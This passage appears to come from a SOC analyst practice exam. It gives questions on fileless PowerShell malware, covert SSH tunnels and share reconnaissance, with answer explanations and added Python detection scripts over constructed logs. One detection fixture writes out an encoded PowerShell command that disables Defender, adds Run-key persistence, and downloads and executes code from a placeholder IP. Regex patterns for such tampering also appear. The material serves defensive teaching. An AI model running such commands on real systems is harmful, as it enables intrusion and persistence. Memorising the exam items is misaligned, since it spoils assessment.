Option B is correct. Fileless malware uses PowerShell or other legitimate tools to execute in memory, bypassing traditional detection mechanisms. Indicators include obfuscated scripts, registry modifications for persistence, and outbound communication to unknown hosts. Immediate SOC response includes isolating affected endpoints, capturing memory to analyze in-memory execution, and examining scripts to understand attacker techniques. Network traffic analysis can identify command-and-control servers. Threat intelligence may provide context about known malware families. Remediation involves cleaning endpoints, restoring security services, updating detection signatures, and monitoring for similar behavior. Evidence preservation ensures thorough forensic investigation and supports regulatory reporting.

Option C suggests misconfigured automation. Misconfigurations rarely include obfuscation, disabling security services, or external communication. Treating this as benign could allow malware to persist.

Option D posits that unusual system activity could be the result of legitimate user testing. While testing and experimentation are common in IT and development environments, legitimate testing is typically structured, documented, and performed within defined boundaries. Proper testing procedures usually involve clearly identified accounts, scheduled activities, and coordination with system administrators. Documentation ensures that testing activities are distinguishable from anomalous behavior and do not inadvertently disrupt operational systems. Furthermore, testing rarely involves bypassing security controls, disabling monitoring tools, or using obfuscated scripts, as these actions introduce significant risk and go against established best practices. Legitimate testing is intended to validate functionality, performance, or security under controlled conditions, not to conceal activity or circumvent protective measures.

The scenario described in Option D, which involves disabling security controls, modifying logs, and employing obfuscated scripts, is inconsistent with standard testing practices. Disabling security mechanisms and obscuring activity are tactics commonly associated with malicious actors seeking to avoid detection. Malware and unauthorized users frequently use obfuscation to hide their scripts, alter execution patterns, and maintain persistence within the system. Ignoring such activity under the assumption that it is part of routine testing is dangerous because it could allow a compromise to persist undetected. Attackers often mimic benign activity or appear as routine administrative operations to evade monitoring and analysis. Misclassifying these indicators as legitimate testing can delay detection, giving adversaries additional time to escalate privileges, exfiltrate data, or spread laterally across the network.

Proper incident response requires careful verification of any activity that falls outside expected behavior. Security teams must examine the context of the actions, cross-reference with documented testing procedures, and assess whether the observed behavior aligns with legitimate operational goals. This includes analyzing log integrity, monitoring network connections, and evaluating script behavior for obfuscation or anomalous execution patterns. If activity cannot be correlated with approved testing or scheduled maintenance, it should be treated as suspicious and investigated thoroughly.

Assuming that unauthorized actions are part of testing also undermines security governance and accountability. Legitimate testing should have clear oversight, ensuring that risks are minimized and that any anomalies are reported and addressed promptly. By bypassing these controls, unauthorized activity not only poses a technical threat but also a compliance and regulatory risk.

While user testing is a plausible explanation for some system activity, the presence of disabled security controls, cleared logs, or obfuscated scripts is inconsistent with standard practices. Treating such behavior as benign testing can result in continued compromise, allowing attackers to maintain access, exfiltrate data, or escalate their privileges. Accurate verification, thorough documentation review, and careful analysis are essential to differentiate legitimate testing from malicious activity, ensuring timely detection, containment, and mitigation of potential threats while preserving system integrity.

Selecting option B ensures proper containment, investigation, and remediation while preserving evidence and strengthening future detection.
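The script examination step in the explanation above can be shown as detection logic run over PowerShell script block log records. This is an added example written for this page, not code from the exam or from Microsoft; the event records, the computer names and the encoded fixture are constructed, and `198.51.100.23` is a documentation-range address standing in for an "unknown IP". The indicator regexes are deliberately coarse and would be refined against a real environment's baseline of signed administrative scripts.

```python
import base64
import re

# Indicator patterns for the behaviours the scenario lists: registry Run-key persistence,
# antivirus disabled, download from a raw IP, in-memory execution, string obfuscation.
INDICATORS = [
    ("persistence_run_key", re.compile(r"CurrentVersion\\Run\b", re.I)),
    ("av_disabled", re.compile(r"Set-MpPreference\s+-Disable\w*|Stop-Service\s+\S*(defend|antivir)", re.I)),
    ("raw_ip_url", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I)),
    ("in_memory_exec", re.compile(r"\bIEX\b|Invoke-Expression|DownloadString", re.I)),
    ("string_obfuscation", re.compile(r"\[char\]|-join|`|\^", re.I)),
]

# -EncodedCommand (and its common short aliases) carries a base64 blob of UTF-16LE script text.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(text):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Score one script block event and return (verdict, sorted hits, decoded text)."""
    text = event["ScriptBlockText"]
    decoded = decode_encoded_command(text)
    hits = set()
    if decoded is not None:
        hits.add("encoded_command")
    for name, pattern in INDICATORS:
        if pattern.search(text) or (decoded is not None and pattern.search(decoded)):
            hits.add(name)
    tamper = {"av_disabled", "persistence_run_key"} & hits
    beacon = {"raw_ip_url", "in_memory_exec"} & hits
    if tamper and beacon:
        verdict = "fileless_malware_suspected"
    elif hits:
        verdict = "review"
    else:
        verdict = "benign"
    return verdict, sorted(hits), decoded


def _encode(ps_text):
    """Encode script text exactly as PowerShell expects for -EncodedCommand."""
    return base64.b64encode(ps_text.encode("utf-16-le")).decode("ascii")


# Constructed detection fixture: the decoded body exhibits the indicators the scenario lists.
# The address is from a documentation range, not a real host.
FIXTURE_MALICIOUS = (
    "$u='http://198.51.100.23/u';"
    "Set-MpPreference -DisableRealtimeMonitoring $true;"
    "Set-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name Updater -Value $u;"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)

# Constructed script block records: one routine reporting script, one encoded command line.
SAMPLE_EVENTS = [
    {"Computer": "WS-204", "ScriptBlockText":
        "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\Reports\\services.csv"},
    {"Computer": "WS-311", "ScriptBlockText":
        "powershell.exe -NoProfile -EncodedCommand " + _encode(FIXTURE_MALICIOUS)},
]


def triage(events):
    """Map each computer to its (verdict, hits) so the SOC can prioritise isolation."""
    return {e["Computer"]: analyse_event(e)[:2] for e in events}


if __name__ == "__main__":
    for computer, (verdict, hits) in triage(SAMPLE_EVENTS).items():
        print(computer, verdict, hits)
```

Decoding before matching is the point: an encoded command line carries none of the indicator strings in plain text, which is exactly why signature-based endpoint tooling in the scenario raised no alert. Script block logging records the decoded content as well, so the same checks apply to that record once it is enabled.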

Question 74

A SOC analyst notices multiple Linux endpoints performing repeated outbound SSH connections to unknown IP addresses on non-standard ports. Unusual processes are observed, and connections occur continuously outside normal hours. What is the most likely threat, and what is the immediate action?

A) Routine system administration; allow.
B) Malicious SSH tunnels for command-and-control or exfiltration; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured automation; correct scripts.
D) Monitoring software; verify with vendor.

Answer: B)

Explanation:

Option A assumes routine administration. Normal SSH access is predictable, occurs on standard ports, and originates from known sources. Continuous connections over non-standard ports with unusual processes indicate malicious activity. Allowing this could enable covert command-and-control or data exfiltration.

Option B is correct. Persistent outbound SSH connections over non-standard ports are indicative of malware establishing tunnels to maintain covert control or transfer data. Indicators include continuous activity outside normal hours and execution of unusual processes. Immediate SOC response involves isolating affected endpoints to prevent further communication, capturing network traffic for analysis, and performing endpoint forensics to identify malicious processes. Correlating traffic with threat intelligence may reveal attacker infrastructure. Remediation includes cleaning infected endpoints, updating detection rules, strengthening firewall and monitoring controls, and reviewing other endpoints for similar behavior. Preserving forensic evidence ensures accurate incident analysis and supports improved detection capabilities.

Option C raises the possibility that unusual network activity, specifically persistent SSH connections to unknown external hosts, could be the result of misconfigured automation scripts. Automation scripts are commonly used in IT environments to streamline repetitive tasks, manage system configurations, or perform scheduled operations. When these scripts are misconfigured, the issues they cause are typically predictable and confined to errors, failed task execution, or log entries that indicate problems. Misconfigured automation may occasionally produce unintended connections or generate unusual traffic, but these anomalies usually follow a recognizable pattern and are limited to internal resources or authorized endpoints. Administrators can often trace these behaviors back to recent changes in script parameters, scheduling, or coding errors, allowing remediation without extensive disruption.

The scenario described in Option C, however, involves persistent SSH connections to external, unknown hosts, which is inconsistent with the expected behavior of misconfigured scripts. Misconfigured automation rarely establishes repeated, long-term communication with external IP addresses that are not recognized or approved by organizational policies. Such behavior is indicative of deliberate and unauthorized activity, potentially the result of malware, advanced persistent threats, or external attackers maintaining control over compromised systems. Persistent SSH connections are commonly used by attackers to create covert command-and-control channels, allowing them to issue commands, exfiltrate data, or move laterally across the network while avoiding detection.

Treating these connections as benign, based solely on the assumption of misconfigured automation, carries significant risk. By dismissing them as errors or routine script behavior, security teams may fail to detect an ongoing compromise, allowing attackers to maintain access to critical systems. This can lead to data breaches, further malware propagation, or unauthorized access to sensitive information. In addition, automated scripts do not typically include mechanisms for persistence or stealth; they execute predefined tasks and terminate according to schedule. In contrast, persistent external connections suggest an intentional attempt to remain undetected, evade monitoring, and maintain long-term access to the system.

Proper response requires thorough verification, including analysis of network traffic, review of SSH session logs, and forensic examination of the endpoints involved. Identifying the source, purpose, and legitimacy of the connections is critical to distinguishing between accidental script misbehavior and malicious activity. Security teams should also assess whether other indicators of compromise, such as unusual file modifications, cleared logs, or unauthorized user accounts, are present, as these often accompany persistent external connections initiated by attackers.

While misconfigured automation can produce anomalies, persistent SSH connections to unknown external hosts fall outside the scope of typical script errors and strongly suggest malicious activity. Treating such behavior as benign risks ongoing compromise, allowing attackers to maintain covert access, exfiltrate data, and potentially spread within the network. Accurate verification, monitoring, and investigation are essential to ensure that these connections are identified, evaluated, and remediated effectively, safeguarding organizational assets and maintaining system integrity.

Option D assumes monitoring software. Legitimate monitoring uses known servers, standard ports, and predictable schedules. Observed behavior is inconsistent with normal monitoring.

Selecting option B ensures containment, investigation, and remediation of covert malware activity while preserving evidence and strengthening detection.
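The traffic-analysis step above (non-standard ports, unknown external destinations, off-hours timing, unusual processes, repetition) can be expressed as a small correlation rule over connection records. This is an added example for this page, not code from the exam or from Zeek; the log lines, host names, the allowlist, the expected-client set, the business-hours window and the internal address ranges are all constructed policy inputs that an organization would replace with its own. The destination and allowlisted addresses come from documentation ranges.

```python
import csv
import io
import os
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed connection log in a Zeek-like shape (invented lines, documentation-range IPs).
SAMPLE_CONN_LOG = """\
ts,src_host,src_ip,dst_ip,dst_port,service,process
2024-05-02T10:15:00,build-01,10.0.5.11,10.0.5.2,22,ssh,ssh
2024-05-02T02:10:00,db-07,10.0.8.23,203.0.113.45,8443,ssh,/var/tmp/.cache/sshd_helper
2024-05-02T02:40:00,db-07,10.0.8.23,203.0.113.45,8443,ssh,/var/tmp/.cache/sshd_helper
2024-05-02T03:10:00,db-07,10.0.8.23,203.0.113.45,8443,ssh,/var/tmp/.cache/sshd_helper
2024-05-02T03:40:00,db-07,10.0.8.23,203.0.113.45,8443,ssh,/var/tmp/.cache/sshd_helper
2024-05-02T14:00:00,web-02,10.0.6.4,198.51.100.10,22,ssh,ssh
2024-05-02T23:30:00,db-07,10.0.8.23,203.0.113.45,8443,ssh,/var/tmp/.cache/sshd_helper
"""

# Constructed policy inputs: the organization's internal ranges, an approved external SSH
# endpoint (e.g. a vendor bastion), the binaries expected to open SSH sessions, and the
# hours the team considers normal.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
ALLOWED_EXTERNAL = {"198.51.100.10"}
EXPECTED_SSH_CLIENTS = {"ssh", "scp", "sftp", "rsync", "ansible-playbook"}
BUSINESS_HOURS = range(8, 19)   # 08:00 to 18:59 local time


def assess_connection(row):
    """Return the list of policy deviations for a single SSH connection record."""
    reasons = []
    when = datetime.fromisoformat(row["ts"])
    dst = ip_address(row["dst_ip"])
    internal = any(dst in net for net in INTERNAL_NETS)
    if int(row["dst_port"]) != 22:
        reasons.append("non-standard port")
    if not internal and str(dst) not in ALLOWED_EXTERNAL:
        reasons.append("external destination not on allowlist")
    if when.hour not in BUSINESS_HOURS:
        reasons.append("outside business hours")
    if os.path.basename(row["process"]) not in EXPECTED_SSH_CLIENTS:
        reasons.append("unexpected client process")
    return reasons


def find_suspicious_ssh(log_text, min_repeats=3):
    """Group SSH connections per (source host, destination) and flag persistent,
    policy-deviating sessions that match the covert tunnel pattern."""
    groups = {}
    for row in csv.DictReader(io.StringIO(log_text)):
        if row["service"] != "ssh":
            continue
        key = (row["src_host"], row["dst_ip"])
        g = groups.setdefault(key, {"count": 0, "reasons": set(), "processes": set()})
        g["count"] += 1
        g["reasons"].update(assess_connection(row))
        g["processes"].add(row["process"])
    findings = {}
    for key, g in groups.items():
        external = "external destination not on allowlist" in g["reasons"]
        persistent = g["count"] >= min_repeats
        # One odd session merits a look; repeated external sessions with several
        # deviations at once are what distinguishes a tunnel from a one-off mistake.
        if external and persistent and len(g["reasons"]) >= 3:
            findings[key] = {
                "connections": g["count"],
                "reasons": sorted(g["reasons"]),
                "processes": sorted(g["processes"]),
            }
    return findings


if __name__ == "__main__":
    for (host, dst), f in find_suspicious_ssh(SAMPLE_CONN_LOG).items():
        print(f"{host} -> {dst}: {f}")
```

The `processes` field in each finding is the hand-off to endpoint forensics: the binary that opened the sessions, and its path, is the first thing to collect from the isolated host. The allowlisted vendor connection from `web-02` shows why an explicit list of approved external SSH endpoints belongs in the rule rather than treating every external destination as hostile.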

Question 75

A SOC analyst identifies endpoints repeatedly accessing rarely used network shares, reading small portions of files, and attempting unauthorized writes. The activity occurs primarily outside business hours. What is the most likely threat, and what is the immediate response?

A) Normal backup activity; allow.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.

Answer: B)

Explanation:

Option A assumes backup activity. Backups typically involve predictable schedules, full file access, and known accounts. Accessing small portions of rarely used shares with unauthorized writes outside business hours is anomalous. Allowing this could enable malware reconnaissance or propagation.

Option B is correct. Malware often performs lateral movement by probing network shares, reading file fragments, and attempting unauthorized writes to map resources. Immediate SOC response involves isolating affected endpoints, reviewing file access logs to determine the scope, and performing endpoint analysis to identify malware or scripts facilitating movement. Remediation includes cleaning infected endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence ensures effective investigation, incident documentation, and improved detection of similar activity in the future.

Option C suggests misconfigured scheduled tasks. Misconfigurations are usually predictable and affect limited systems. Observed suspicious activity across multiple endpoints is unlikely to be caused by misconfiguration alone.

Option D assumes that off-hours activity on a network or endpoint is legitimate, suggesting that any access to files, shares, or resources outside standard business hours can be considered benign. While it is true that some legitimate operations occur off-hours, such as scheduled backups, automated processes, or maintenance tasks, these activities are typically well-documented, predictable, and limited to known systems and resources. Normal users rarely access infrequently used shares, attempt unauthorized writes, or engage with sensitive resources outside their normal responsibilities. When unusual activity is observed in off-hours periods, especially targeting rarely used or restricted resources, it warrants scrutiny rather than dismissal.

Malware and malicious actors often exploit off-hours windows because network monitoring and human oversight are reduced during these periods. Attackers may use these opportunities to conduct reconnaissance, map network topologies, identify valuable assets, or attempt lateral movement across systems without detection. Low-level activity, such as unauthorized file writes or access attempts on rarely used shares, can indicate that malware is probing the network or establishing footholds in preparation for more extensive operations. If such behavior is treated as legitimate due to its timing, the malicious activity may continue unchecked, increasing the risk of further compromise and data exfiltration.

Behavioral baselines are critical in distinguishing legitimate off-hours activity from malicious activity. Legitimate off-hours processes are generally predictable, scheduled, and documented, often tied to automated tasks or administrative duties. In contrast, unexpected access to rarely used shares, attempts to write to restricted directories, or other anomalous operations do not fit these predictable patterns. These actions may indicate that malware is attempting to escalate privileges, propagate laterally, or gather sensitive information, all while minimizing the likelihood of detection. Ignoring such anomalies based solely on the assumption of off-hours legitimacy bypasses the necessary verification and investigative steps required to assess potential threats accurately.

Proactive monitoring and investigation of off-hours anomalies are essential to prevent compromise escalation. Security teams must analyze access logs, verify user behavior against expected patterns, and correlate unusual activities with other indicators of compromise, such as network traffic anomalies or system changes. Prompt response can isolate affected systems, mitigate malware spread, and prevent unauthorized access to sensitive data. Failure to investigate off-hours anomalies can allow malware to remain operational, increasing both the difficulty of remediation and the potential impact on the organization.

Assuming off-hours activity is benign is a high-risk approach. Normal users rarely engage in accessing unused shares or performing unauthorized writes outside business hours, and malware often exploits these periods to operate covertly. Ignoring such activity can facilitate reconnaissance, lateral movement, and persistent compromise within the network. Careful analysis, contextual evaluation, and verification of anomalous off-hours activity are critical to ensure timely detection and containment of threats while maintaining organizational security.

Selecting option B ensures early detection, containment, and remediation of malware, protecting sensitive data and maintaining network integrity.
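The behavioral-baseline argument in the explanation above (legitimate off-hours activity is predictable, scheduled and tied to known accounts; reconnaissance touches rarely used shares, reads fragments and trips write denials) can be demonstrated end to end: learn a baseline from past share-access events, then score recent events against it. This is an added example for this page, not code from the exam or from any SIEM. Both event sets, the accounts, hosts and shares, and the thresholds are constructed; a real implementation would read SMB audit records over a much longer window.

```python
import csv
import io
from collections import Counter, defaultdict
from datetime import datetime

# Constructed file-share access events in a simplified SMB audit shape. All accounts,
# hosts and shares are invented. The baseline window contains a scheduled backup
# account that legitimately runs at 22:00 and reads whole files.
BASELINE_EVENTS = """\
ts,account,host,share,action,status,bytes,file_size
2024-04-01T09:12:00,alice,ws-101,finance,read,success,2097152,2097152
2024-04-01T22:00:00,svc-backup,bk-01,finance,read,success,2097152,2097152
2024-04-01T22:05:00,svc-backup,bk-01,archive,read,success,5242880,5242880
2024-04-02T10:30:00,alice,ws-101,finance,write,success,4096,4096
2024-04-02T22:00:00,svc-backup,bk-01,finance,read,success,2097152,2097152
2024-04-02T22:05:00,svc-backup,bk-01,archive,read,success,5242880,5242880
2024-04-03T14:00:00,carol,ws-109,legacy-hr,read,success,1048576,1048576
"""

# Constructed recent window: the backup runs as usual, and one workstation reads small
# fragments of large files on a rarely used share at 01:00 and is denied a write.
RECENT_EVENTS = """\
ts,account,host,share,action,status,bytes,file_size
2024-05-03T22:00:00,svc-backup,bk-01,finance,read,success,2097152,2097152
2024-05-04T01:12:00,bob,ws-118,legacy-hr,read,success,4096,52428800
2024-05-04T01:13:00,bob,ws-118,legacy-hr,read,success,4096,31457280
2024-05-04T01:15:00,bob,ws-118,legacy-hr,write,denied,0,0
2024-05-04T01:20:00,bob,ws-118,archive,read,success,4096,5242880
"""


def parse(events_text):
    return list(csv.DictReader(io.StringIO(events_text)))


def build_baseline(events):
    """Learn, per account, which shares and hours are normal, and how often each share is used."""
    shares = defaultdict(set)
    hours = defaultdict(set)
    share_use = Counter()
    for e in events:
        shares[e["account"]].add(e["share"])
        hours[e["account"]].add(datetime.fromisoformat(e["ts"]).hour)
        share_use[e["share"]] += 1
    return {"shares": shares, "hours": hours, "share_use": share_use}


def assess_event(e, baseline, rare_threshold=2, partial_ratio=0.05):
    """Return the anomaly reasons for one access event measured against the baseline."""
    reasons = []
    acct, share = e["account"], e["share"]
    hour = datetime.fromisoformat(e["ts"]).hour
    if share not in baseline["shares"].get(acct, set()):
        reasons.append("share not in account baseline")
    if baseline["share_use"][share] < rare_threshold:
        reasons.append("rarely used share")
    if hour not in baseline["hours"].get(acct, set()):
        reasons.append("hour outside account baseline")
    size = int(e["file_size"])
    if e["action"] == "read" and size > 0 and int(e["bytes"]) / size < partial_ratio:
        reasons.append("partial read of file")
    if e["action"] == "write" and e["status"] == "denied":
        reasons.append("denied write")
    return reasons


def find_reconnaissance(baseline_text, recent_text, min_reasons=3):
    """Aggregate per source host; a host showing several distinct anomaly types is flagged."""
    baseline = build_baseline(parse(baseline_text))
    per_host = defaultdict(lambda: {"events": 0, "reasons": set(), "shares": set()})
    for e in parse(recent_text):
        h = per_host[e["host"]]
        h["events"] += 1
        h["reasons"].update(assess_event(e, baseline))
        h["shares"].add(e["share"])
    return {
        host: {"events": h["events"], "reasons": sorted(h["reasons"]), "shares": sorted(h["shares"])}
        for host, h in per_host.items()
        if len(h["reasons"]) >= min_reasons
    }


if __name__ == "__main__":
    for host, finding in find_reconnaissance(BASELINE_EVENTS, RECENT_EVENTS).items():
        print(host, finding)
```

The backup host `bk-01` produces no reasons even though it works at 22:00, because its account, hour and full-file reads all match the learned baseline; timing alone is never the signal. The flagged host's `shares` list scopes the log review the explanation calls for, and the account in its events is the one whose integrity should be validated.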